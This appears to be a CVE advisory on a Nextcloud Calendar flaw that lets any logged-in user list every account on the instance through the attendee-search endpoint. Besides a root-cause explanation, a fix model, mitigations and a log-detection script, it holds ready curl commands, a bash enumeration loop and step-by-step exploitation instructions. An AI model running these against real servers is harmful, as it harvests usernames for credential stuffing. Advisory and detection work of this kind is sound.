Nextcloud, Broken Access Control, CVE-2026-45286 (Medium) -DC-Jun2026-195


How CVE-2026-45286 Works

This flaw resides in the Nextcloud Calendar app's attendee suggestion endpoint. When a user starts typing a name in an event's attendee field, the app sends an API request to fetch matching users. The backend, specifically the `Calendar` app's API logic, then queries the Nextcloud user backend directly, ignoring the instance's global privacy controls.
First, the vulnerable versions make no distinction between a "share" and a "calendar invitation". Administrators can restrict sharing via the "Share API" settings in Nextcloud, but the vulnerable endpoint bypasses all of those restrictions: the `Calendar` app maintains its own logic for finding users, which creates a hidden attack surface outside the usual enforcement point.
Second, the backend uses the `searchProperties` method on the user backend. This method normally respects the "sharing restrictions" configuration. In the vulnerable code path, however, the `Calendar` app does not pass the necessary context to the user backend to enforce those restrictions. Instead, it invokes a low-level search function with permission flags that always return every user matching the search term.
Third, an attacker with a valid account crafts a request to the attendee suggestion endpoint, typically an OCS API endpoint like `/ocs/v2.php/apps/calendar/api/v1/attendees?search=...`. This is the same endpoint the web interface uses for its autocomplete feature. By iterating through letters and patterns (e.g., `?search=a`, `?search=b`, `?search=admin`), the attacker builds a complete list of valid usernames on the instance.
Fourth, the response is an OCS-compliant XML or JSON object containing user IDs, display names, and sometimes email addresses. How much data is returned depends on how the administrator configured user attributes, but the user ID itself is always present.
Fifth, this leakage is subtle: it only reveals that a user exists on the instance, not their password or file contents. In security terms, however, a username is a valid identifier that lowers the complexity of a brute-force or credential-stuffing attack.
Finally, the root cause is a missing permission check. The fix implemented in versions 5.5.17 and 6.2.3 adds a call to the `searchForUsers` method with the correct `shareeEnumeration` and `shareeEnumerationInGroupOnly` flags. This forces the backend to respect the same "sharing restrictions" that other collaborative features already follow.
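A simplified model of the gap described above, added here as an illustration and not Nextcloud's own code: the user records, the group model, the `backend_search()` helper and the exact-match and group-only semantics given to the two policy flags are assumptions of the model, chosen to mirror the write-up (the vulnerable path hands the raw backend results back and ignores the flags; the fixed path enforces them before returning anything).

```python
"""Simplified model of the attendee-search permission gap.

Added illustration, not Nextcloud code: the user records, the group model,
backend_search() and the semantics given to the two policy flags are all
assumptions of this model.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    uid: str
    display_name: str
    groups: frozenset


# Constructed sample directory; none of these are real accounts.
DIRECTORY = [
    User("alice", "Alice Example", frozenset({"staff", "finance"})),
    User("admin", "Admin", frozenset({"admin"})),
    User("anna", "Anna Example", frozenset({"legal"})),
    User("bob", "Bob Example", frozenset({"staff"})),
]


def backend_search(term):
    """Low-level prefix search on uid / display name with no policy awareness.
    Stands in for the user-backend call the vulnerable path invoked directly."""
    t = term.lower()
    return [u for u in DIRECTORY
            if u.uid.startswith(t) or u.display_name.lower().startswith(t)]


def attendee_search_vulnerable(term, requester, sharee_enumeration=True,
                               in_group_only=False):
    """Vulnerable path: the policy flags are accepted but never consulted,
    so the raw backend results go straight back to the caller."""
    return [u.uid for u in backend_search(term)]


def attendee_search_fixed(term, requester, sharee_enumeration=True,
                          in_group_only=False):
    """Fixed path: the same sharee-enumeration policy the share dialog honours
    is applied before anything is returned. Assumed semantics: enumeration
    off -> only an exact uid match; group-only -> only users who share at
    least one group with the requester."""
    results = backend_search(term)
    if not sharee_enumeration:
        results = [u for u in results if u.uid == term.lower()]
    elif in_group_only:
        results = [u for u in results if u.groups & requester.groups]
    return [u.uid for u in results]


def enumeration_exposure(search_fn, requester, **policy):
    """Collect every uid a requester could learn by walking single-letter
    prefixes (the probing pattern in the write-up) under a given policy."""
    found = set()
    for ch in "abcdefghijklmnopqrstuvwxyz":
        found.update(search_fn(ch, requester, **policy))
    return found


if __name__ == "__main__":
    bob = DIRECTORY[3]  # an ordinary account in the "staff" group only
    policy = dict(sharee_enumeration=False, in_group_only=True)
    print("vulnerable:", sorted(enumeration_exposure(attendee_search_vulnerable, bob, **policy)))
    print("fixed:     ", sorted(enumeration_exposure(attendee_search_fixed, bob, **policy)))
```

The point the model makes is about the enforcement location: the restriction is only effective when every caller of the user backend goes through the same policy check, which is exactly what the fix restores by routing the Calendar endpoint through `searchForUsers` with the flags set.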

DailyCVE Form:

Platform: Nextcloud Calendar
Version: 5.5.13–5.5.16, 6.2.0–6.2.2
Vulnerability: User Enumeration
Severity: Medium (CVSS 4.3)
Date: 2026-06-01

Prediction: Patched 2026-06-01

What Undercode Says:

1. Identify the vulnerable endpoint

```shell
curl -X GET 'https://target.nextcloud.local/ocs/v2.php/apps/calendar/api/v1/attendees?search=a' \
  -H 'OCS-APIRequest: true' \
  -H 'Authorization: Bearer VALID_TOKEN'
```

2. Basic enumeration loop

```shell
for ch in {a..z}; do
  curl -s "https://target/ocs/v2.php/apps/calendar/api/v1/attendees?search=$ch" \
    -H "Authorization: Bearer $TOKEN" | grep -oE '"userId":"[^"]+"' | cut -d'"' -f4
done
```

3. Advanced wordlist probing (JSON output)

```shell
curl -X POST 'https://target/ocs/v2.php/apps/calendar/api/v1/attendees' \
  -H 'Content-Type: application/json' \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"search":"admin"}'
```

How to Exploit:

  1. Authenticate to the Nextcloud instance (any valid user).
  2. Intercept traffic from the “Add Attendee” autocomplete feature, observing the OCS request to /ocs/v2.php/apps/calendar/api/v1/attendees.
  3. Replay this request with a parameterized search term (?search=user).
  4. Parse the XML/JSON response; each user ID appears in the corresponding XML element or in the `"userId"` JSON field.
  5. Automate using a loop with a wordlist to extract every valid account.

Protection from this CVE

  1. Immediate Upgrade – Apply patch versions 5.5.17 or 6.2.3 without delay.
  2. Workaround – Disable the Calendar app entirely until upgrade is possible.
  3. Configure `shareeEnumeration` to `false` and `shareeEnumerationInGroupOnly` to `true` (though the vulnerable endpoint ignored them).
  4. Network – Forbid internal OCS API calls from untrusted networks.
  5. Audit – Search logs for suspicious volume of `?search=` requests to /ocs/v2.php/apps/calendar/api/v1/attendees.
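For the audit step, an added detection example that is not from the page or from Nextcloud: it scans web-server access-log lines in the common "combined" format for bursts of attendee-search requests and for the short-prefix probing pattern described above. The log lines are constructed samples, and the window and thresholds are assumptions to tune per instance (a busy shared calendar will legitimately produce a handful of searches per minute per user).

```python
"""Flag attendee-search enumeration in access logs.

Added detection example, not Nextcloud code. Log lines below are
constructed samples; the thresholds are assumptions to tune per instance.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/ocs/v2.php/apps/calendar/api/v1/attendees"

# Combined log format: ip - user [ts] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one ordinary user typing a name, one account
# walking single-letter prefixes from a second address.
SAMPLE_LOG = [
    '10.0.0.2 - alice [01/Jun/2026:10:00:01 +0000] "GET /ocs/v2.php/apps/calendar/api/v1/attendees?search=bo HTTP/1.1" 200 180',
    '10.0.0.2 - alice [01/Jun/2026:10:00:03 +0000] "GET /ocs/v2.php/apps/calendar/api/v1/attendees?search=bob HTTP/1.1" 200 180',
    '10.0.0.2 - alice [01/Jun/2026:10:00:09 +0000] "GET /index.php/apps/files/ HTTP/1.1" 200 4096',
] + [
    f'10.0.0.5 - mallory [01/Jun/2026:10:05:{i:02d} +0000] "GET /ocs/v2.php/apps/calendar/api/v1/attendees?search={ch} HTTP/1.1" 200 2048'
    for i, ch in enumerate("abcdefghij")
]


def parse_line(line):
    """Return a dict for a request to the attendee endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != ENDPOINT:
        return None
    terms = parse_qs(url.query).get("search", [])
    return {
        "ip": m.group("ip"),
        "user": m.group("user"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "term": terms[0] if terms else "",
        "status": int(m.group("status")),
    }


def find_enumeration(lines, window_seconds=60, max_requests=8, max_short_terms=4):
    """Group attendee searches by (ip, user) and flag a pair when it exceeds
    max_requests inside any sliding window, or uses many distinct 1-2 char
    search terms (prefix walking)."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            events[(ev["ip"], ev["user"])].append(ev)

    findings = []
    window = timedelta(seconds=window_seconds)
    for (ip, user), evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        start, peak = 0, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        short_terms = {e["term"] for e in evs if len(e["term"]) <= 2}
        reasons = []
        if peak >= max_requests:
            reasons.append(f"{peak} attendee searches within {window_seconds}s")
        if len(short_terms) >= max_short_terms:
            reasons.append(f"{len(short_terms)} distinct 1-2 char search terms")
        if reasons:
            findings.append({"ip": ip, "user": user,
                             "requests": len(evs), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_enumeration(SAMPLE_LOG):
        print(f"{f['ip']} {f['user']}: {f['requests']} requests; " + "; ".join(f["reasons"]))
```

On a real instance, feed the script the reverse proxy or Nextcloud web-server access log rather than `SAMPLE_LOG`; keying on the authenticated user as well as the source address matters here because the endpoint requires a valid login, so the account doing the walking is itself a lead for the incident responder.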

Impact

  • Information Disclosure – Attackers learn all valid usernames on the instance.
  • Lateral Movement – Enumerated users become targets for credential stuffing.
  • Privacy Violation – Reveals user presence in closed or sensitive groups.
  • Reconnaissance – Enables further attacks (SSRF, IDOR, etc.) requiring usernames.
  • Compliance – May violate data protection rules (GDPR, HIPAA) by exposing user identities.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
